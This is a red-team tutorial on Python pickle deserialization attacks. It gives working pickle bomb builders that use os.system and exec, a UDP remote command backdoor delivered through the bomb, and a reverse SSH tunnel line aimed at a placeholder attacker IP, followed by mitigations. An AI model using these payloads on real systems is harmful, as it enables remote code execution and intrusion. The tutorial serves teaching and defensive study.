
Python Deserialization Attack: How to Build a Pickle Bomb

Yuancheng Liu

Head of Technology at National Cybersecurity R&D Laboratories SG

Published: July 7, 2024

This article introduces an old, classic insecure feature of Python data serialization (the pickle library) and demonstrates how a red team attacker can exploit it to create a malicious binary or text data file that executes remote code or commands upon deserialization. The following attack flow diagram illustrates this process:

Figure-00: Python Deserialization Attack Flow diagram, version v0.0.3 (2024)

We will follow three steps, with program code, to show how deserialization attacks work:

[ Step1 ] Crafting Malicious Data: An attacker crafts a malicious payload that, when deserialized, will execute code on the target system. This payload often takes advantage of the inherent trust the deserialization process has in the incoming data.
[ Step2 ] Injection: The attacker injects the malicious payload into the application, typically through input fields, network requests, or other data sources.
[ Step3 ] Execution: The application deserializes the malicious data, triggering the execution of the embedded code. This can lead to arbitrary code execution, compromising the system's security.

Important: All the scripts provided are intended for cybersecurity research and training purposes only. Do not use them to attack real-world systems.

Introduction

Deserialization is the process of converting data from a serialized format back into its original data structure. A deserialization attack occurs when an application deserializes untrusted or maliciously crafted data, leading to potential security vulnerabilities. These attacks can result in various forms of exploitation, including arbitrary code execution, data corruption, and denial of service. The vulnerability arises because the deserialization process often assumes that the incoming data is well-formed and trustworthy. Several Common Vulnerabilities and Exposures (CVE) entries relate to Python pickle deserialization:

CVE-2019-6446: NumPy 1.16.0 and earlier uses the pickle module unsafely, so a crafted serialized object passed to numpy.load() can execute arbitrary code.
CVE-2020-13091: pandas through 1.0.3 can execute commands from an untrusted file passed to read_pickle().
CVE-2020-13092: scikit-learn through 0.23.0 can execute commands from an untrusted file passed to joblib.load().
CVE-2024-34997: A critical deserialization vulnerability identified in joblib version 1.4.2, specifically in the NumpyArrayWrapper().read_array() component within the joblib.numpy_pickle module.

Introduction of Python Data Serialization

In Python, data serialization often involves converting data into formats like JSON, YAML, or XML for storage and retrieval. These formats are widely used due to their readability and interoperability. However, they can be limited when handling complex data structures, such as nested dictionaries with bytes data or built-in objects. Consider the following example:

# An example data structure that the standard json module cannot serialize directly.
from collections import OrderedDict
data = OrderedDict({
    'Timestamp': '2023-04-05 16:00:00',
    'IoTData': {
        'IP': '172.23.155.209',
        'Port': 3001,
        'value': [1.2, 1.3, 1.4],
        'RptPeer': {
            'Hub1': 1.2,
            'Hub2': 1.3
        },
        'CfgSet': {'CT100', 'COM3', 3}  # sets are not supported by JSON
    }
})

For such complex data objects, formats like JSON, YAML, or XML are not suitable. In these cases, the pickle library provides a convenient way to serialize and deserialize data. The pickle module can convert complex Python objects into a byte stream (serialization) and then convert the byte stream back into the original objects (deserialization).

import pickle
# Serialize the data to bytes
serialized_data = pickle.dumps(data)
# Deserialize the bytes back to the original data
deserialized_data = pickle.loads(serialized_data)

Using pickle.dumps() allows you to serialize the data into bytes, making it easy to save to a file or transfer over a network. The pickle.loads() function can then be used to deserialize the bytes back into the original data structure. The types of objects that can be pickled and unpickled are shown below:

Figure-01: Python types that can be pickled, version v0.0.3 (2024)

This capability is particularly useful for storing or transmitting complex Python objects that are not compatible with simpler serialization formats.
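The difference between the two approaches can be seen in a few lines. The sketch below is only an illustration: it uses a smaller dictionary than the example above, and the names json_ok and restored are introduced here for the demonstration.

```python
import json
import pickle

# A small nested structure containing a set, similar to the example above.
data = {
    'Port': 3001,
    'CfgSet': {'CT100', 'COM3', 3},
}

# The standard json encoder has no representation for a set,
# so json.dumps() raises TypeError.
try:
    json.dumps(data)
    json_ok = True
except TypeError:
    json_ok = False

# pickle round-trips the same structure, set included.
restored = pickle.loads(pickle.dumps(data))

print(json_ok)           # False
print(restored == data)  # True
```

The set survives the pickle round trip as a set, whereas a JSON-based approach would first have to convert it to a list and lose the type.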

Introduction of Python Deserialization Vulnerabilities

While using the Python pickle module to serialize and deserialize data is convenient, it is insecure when handling untrusted data. The official Python documentation highlights this risk:

Figure-02: Python Pickle Doc Warning message, version v0.0.3 (2024)

The pickle module can serialize and deserialize Python objects, but it has the capability to execute arbitrary code during deserialization. This feature can be exploited by attackers to run malicious code on the target system. A simple way to create a pickle bomb involves using an object with a custom __reduce__() method as shown in the pickle doc:

Figure-03: Python object.__reduce__() function document, version v0.0.3 (2024)

The __reduce__() method can return a callable together with a tuple of arguments. When the data is deserialized, pickle calls that callable with those arguments. Here is an example of a simple serialized data loader that can load both binary and text format data:

# A normal pickle serialized data file load program (version v0.0.2)
import base64
import pickle

while True:
    choice = input("Input load serialized data file format ([1] byte file, [2] txt file): ")
    if choice == '1':
        # Binary file: unpickle directly from the file handle.
        with open('data.pkl', 'rb') as fh:
            originalData = pickle.load(fh)
        print(originalData)
    elif choice == '2':
        # Text file: the pickle bytes are stored as a base64 string.
        with open('data.txt', 'r') as fh:
            dataStr = fh.read()
        originalData = pickle.loads(base64.b64decode(dataStr))
        print(originalData)
    else:
        print("Exit....")
        break

Link to download the full pickled data loader program: pickleBombLoader.py

To build a simple Python pickle bomb, we can override the __reduce__() method to return the os.system function with a command string. This way, when the data loader reads the data file, it will execute the command:

import os
import pickle
import base64

# A simple pickle bomb that runs a command
class PickleCmd:
    def __reduce__(self):
        cmd = 'uname -a'
        return os.system, (cmd,)
obj = PickleCmd()
pickledata = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)

with open('data.pkl', 'wb') as handle:
    pickle.dump(obj, handle, protocol=pickle.HIGHEST_PROTOCOL)

dataStr = base64.b64encode(pickledata).decode('ascii')
with open('data.txt', 'w') as fh:
    fh.write(dataStr)

When we run this script, it will create two data files: a binary data file (`data.pkl`) and a text data file (`data.txt`). Using the loader to read these files will execute the command, demonstrating how the system information can be retrieved:

Figure-04: Simple python bomb execution result, version v0.0.3 (2024)

With the ability to execute commands, an attacker can integrate harmful actions, such as deleting files or retrieving credential information. This highlights the severe risk of deserializing untrusted data with the pickle module. Always ensure that serialized data is from a trusted source to avoid such vulnerabilities.
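One way to check that a pickle file really comes from a trusted producer is to sign it with a keyed hash and verify the signature before unpickling, an approach the Python documentation also suggests. The following is a minimal sketch under stated assumptions: SECRET_KEY, sign_pickle() and load_signed_pickle() are hypothetical names introduced here, and the key would need to be stored securely and shared only between the producer and the consumer.

```python
import hashlib
import hmac
import pickle

# Hypothetical shared secret; in practice it would come from a secure store.
SECRET_KEY = b'replace-with-a-real-secret'
TAG_LEN = hashlib.sha256().digest_size  # 32 bytes for SHA-256

def sign_pickle(obj):
    """Serialize obj and prepend an HMAC-SHA256 tag over the pickle bytes."""
    payload = pickle.dumps(obj)
    tag = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    return tag + payload

def load_signed_pickle(blob):
    """Verify the tag first; only unpickle when it matches."""
    tag, payload = blob[:TAG_LEN], blob[TAG_LEN:]
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError('signature mismatch, refusing to unpickle')
    return pickle.loads(payload)

blob = sign_pickle({'Port': 3001})
print(load_signed_pickle(blob))  # {'Port': 3001}

# Flip one bit of the payload: verification fails and nothing is unpickled.
tampered = blob[:-1] + bytes([blob[-1] ^ 0x01])
try:
    load_signed_pickle(tampered)
    rejected = False
except ValueError:
    rejected = True
print(rejected)  # True
```

The signature only proves that the data was produced by someone holding the key. It does not make the pickle format itself safe, so the key must never be exposed to untrusted parties.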

Build Python Pickle Bomb

In this section, we will build a more complex Python pickle bomb program that allows us to bypass system authorization mechanisms, remotely execute commands on the victim machine, and retrieve the results.

Clarification on Command Execution

Before we proceed, it's important to clarify how commands can be executed within the __reduce__() function. Consider the following modification:

class PickleCmd:
    def __reduce__(self):
        os.system('date')
        os.system('ifconfig')
        with open('testfile.txt', 'w') as fh:
            fh.write("Test file contents")
        cmd = ('uname -a')
        return os.system, (cmd,)

If we rebuild the pickle bomb and load it again, we can see that the additional commands are not executed by the loader:

Figure-05: Simple python bomb execution result, version v0.0.3 (2024)
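The reason is that the body of __reduce__() runs when the object is pickled, not when the data is loaded. A minimal, harmless sketch makes the timing visible; the Demo class and the calls list are hypothetical names introduced for illustration, and the returned callable is simply the built-in list.

```python
import pickle

calls = []  # records each time the body of __reduce__ runs

class Demo:
    def __reduce__(self):
        # This statement runs while the object is being pickled.
        calls.append('reduce body ran')
        # Only this (callable, args) pair is written into the pickle.
        return list, (('a', 'b'),)

blob = pickle.dumps(Demo())
calls_after_dump = len(calls)

restored = pickle.loads(blob)
calls_after_load = len(calls)

print(restored)                              # ['a', 'b']
print(calls_after_load == calls_after_dump)  # True: loading did not run the body
```

Loading the data calls list(('a', 'b')) and never touches the Demo class, which is why the extra statements inside __reduce__() have no effect on the machine that loads the file.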

Only the callable returned by __reduce__() is stored in the pickle and executed at load time. To perform more complex tasks, such as running commands on the victim's machine, we can use a reverse shell command. For example:

cmd = ('ssh -R 0.0.0.0:7070:localhost:22 <redTeam hacker\'s IP address>')

However, this method exposes the red team attacker's IP address in the command logs. If we want to run more complex Python programs without exposing this information, we can use the exec() function. The exec() function allows you to execute arbitrary Python code from a string or compiled code input. It is useful for running dynamically generated Python code, though it should be used cautiously due to its potential risks.


Improving the Pickle Bomb Program

Let's improve our pickle bomb program to return the exec function and a piece of Python code in the __reduce__() function:

import pickle
import base64

codeContent="""
with open('testfile.txt', 'w') as fh:
    fh.write("Test file contents")
"""
# A simple pickle bomb that runs a piece of Python code
class PickleCode:
    def __reduce__(self):
        return exec, (codeContent,)
    
obj = PickleCode()
pickledata = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)

with open('data.pkl', 'wb') as handle:
    pickle.dump(obj, handle, protocol=pickle.HIGHEST_PROTOCOL)

dataStr = base64.b64encode(pickledata).decode('ascii')
with open('data.txt', 'w') as fh:
    fh.write(dataStr)

After loading the data file, you will see that the Python code to create a file is executed:

Figure-06: Improved python bomb execution result, version v0.0.3 (2024)

By leveraging the exec() function, we can execute more complex and dynamic Python code, making the pickle bomb more powerful and versatile for demonstrating security vulnerabilities in the deserialization process. Remember, this information is for educational purposes only and should not be used for malicious activities.

Building a More Complex Python Pickle Bomb

In this section, we will build a more complex Python pickle bomb program. This program will include a UDP server that receives command execution requests from the red team attacker, executes them, and returns the results to the sender. Because the payload only listens and contains no attacker address, the red team's IP address is not exposed in the data file, even if the bomb is discovered.

Here is the UDP server program:

# A normal UDP server hosted on port 3000 that accepts different UDP client connections,
# executes commands, and sends the results back to the corresponding client (version v0.0.
import socket
import subprocess
BUFFER_SZ = 4096 
port = 3000
udpServer = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udpServer.bind(('0.0.0.0', port))
while True:
    data, address = udpServer.recvfrom(BUFFER_SZ)
    cmdMsg = data.decode('utf-8')
    if cmdMsg == '': continue
    if cmdMsg == 'exit': exit()
    result = 'Command not found!'
    try:
        result = subprocess.check_output(cmdMsg, shell=True).decode()
    except Exception as err:
        result = str(err)
    udpServer.sendto(result.encode('utf-8'), address)

Link to download UDP command execution server program: udpCmdServer.py

Next, we will read this Python program as a string, pass it as a parameter in the pickle bomb object, and create the pickle bomb data file with a simple bomb builder:

# A normal pickle serialized data file create program (version v0.0.2)
import pickle
import base64

# File to serialize:
#fileName = 'flaskWebShellApp.py'
fileName = 'udpCmdServer.py'
dataStr = None 
with open(fileName, 'r') as fh:
    dataStr = fh.read()

class PickleBomb:
    def __reduce__(self):
        pass
        return exec, (dataStr,)

obj = PickleBomb()
pickledata = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)

with open('data.pkl', 'wb') as handle:
    pickle.dump(obj, handle, protocol=pickle.HIGHEST_PROTOCOL)

dataStr = base64.b64encode(pickledata).decode('ascii')
with open('data.txt', 'w') as fh:
    fh.write(dataStr)

Link to download Full Pickle Bomb Builder Program: pickleBombBuilder.py

Now, if anyone runs the pickle loader or any program that attempts to load the pickle file, the bomb will be activated:

We can then use a simple UDP client program to connect to the victim's IP address and run commands:

Link to download Full UDP client program (udpCom.py)

As shown, we can check the folder structure and network information of the victim.

Remark: Since the Python file is passed in as a string, if the script calls a library that is not installed on the victim's machine, it will fail to execute.
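A defender who receives a suspicious data file can examine it without loading it. The standard pickletools module walks the opcode stream without executing anything, so the opcodes that import a global or call something can be flagged for review. The sketch below is an assumption-laden triage aid, not a detector: the SUSPICIOUS_OPCODES set and the find_suspicious_opcodes() helper are names introduced here, and many legitimate pickles (any class instance, for example) use the same opcodes.

```python
import pickle
import pickletools
from collections import OrderedDict

# Opcodes that import a global or invoke a callable while unpickling.
SUSPICIOUS_OPCODES = {
    'GLOBAL', 'STACK_GLOBAL', 'REDUCE', 'INST', 'OBJ',
    'NEWOBJ', 'NEWOBJ_EX', 'BUILD',
}

def find_suspicious_opcodes(blob):
    """Walk the opcode stream without executing it and collect risky opcodes."""
    found = []
    for opcode, arg, pos in pickletools.genops(blob):
        if opcode.name in SUSPICIOUS_OPCODES:
            found.append(opcode.name)
    return found

# Plain containers and numbers need no imports or calls.
plain = pickle.dumps({'Port': 3001, 'value': [1.2, 1.3]})
# An OrderedDict is rebuilt by importing its class and calling it.
with_import = pickle.dumps(OrderedDict(a=1))

print(find_suspicious_opcodes(plain))        # []
print(find_suspicious_opcodes(with_import))  # includes 'REDUCE'
```

For a human-readable listing of the same stream, pickletools.dis() prints every opcode with its argument, which shows exactly which module and name a file would import.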

Mitigations of Python Deserialization Attack

To prevent Python deserialization attacks, there are several practices we can follow:

1. Avoid Deserialization of Untrusted Data: Do not deserialize data from untrusted sources. Use safer serialization formats such as JSON or XML where possible, as they do not support code execution during deserialization.

2. Validate Input: Implement strict input validation to ensure that only well-formed and expected data is processed.

3. Use Safe Libraries: Prefer libraries and frameworks that are designed with security in mind and that do not support unsafe deserialization.

4. Sandboxing: If deserialization of untrusted data is unavoidable, run the deserialization process in a restricted environment (sandbox) to limit the potential impact.
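When pickle cannot be avoided, the Python documentation describes restricting which globals the unpickler may import by overriding Unpickler.find_class(). The following is a minimal sketch along those lines; the SAFE_BUILTINS allowlist and the restricted_loads() helper are assumptions chosen for illustration, and a real application would list only the types it actually expects.

```python
import builtins
import io
import pickle

# Assumed allowlist for illustration; adjust to the types the application needs.
SAFE_BUILTINS = {'range', 'complex', 'set', 'frozenset', 'slice'}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Only allow a few harmless builtins; everything else is rejected.
        if module == 'builtins' and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def restricted_loads(blob):
    """Counterpart of pickle.loads() that refuses unexpected globals."""
    return RestrictedUnpickler(io.BytesIO(blob)).load()

# Plain containers and an allowlisted builtin load normally.
ok = restricted_loads(pickle.dumps({'value': [1, 2, 3], 'r': range(3)}))
print(ok)  # {'value': [1, 2, 3], 'r': range(0, 3)}

# A pickle that references any other global is refused before it can be called.
try:
    restricted_loads(pickle.dumps(len))  # builtins.len is not on the allowlist
    blocked = False
except pickle.UnpicklingError:
    blocked = True
print(blocked)  # True
```

Because find_class() is consulted for every global the data asks for, a payload that references os.system or exec is rejected at the import step, before anything is called. An allowlist is preferable to a blocklist here, since it fails closed for names nobody anticipated.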

Conclusion and Reference

Deserialization attacks pose a significant risk, particularly when using insecure libraries like Python's pickle. Understanding the nature of these vulnerabilities and implementing best practices to avoid or mitigate them is crucial for maintaining secure applications.

Reference:

Demo Step and Program execution

For downloading the programs to try the demo, please follow the Program Setup and Program Execution section in this link:

https://github.com/LiuYuancheng/Python_Malwares_Repo/tree/main/src/pickleBomb

# Created:     2024/07/06
# Version:     v0.1.1
# Copyright:   Copyright (c) 2024 LiuYuancheng
# License:     MIT License

Thanks for taking the time to read this article. If you have any questions or suggestions, or find any program bugs, please feel free to message me. Comments and improvement advice are very welcome so we can make our work better.
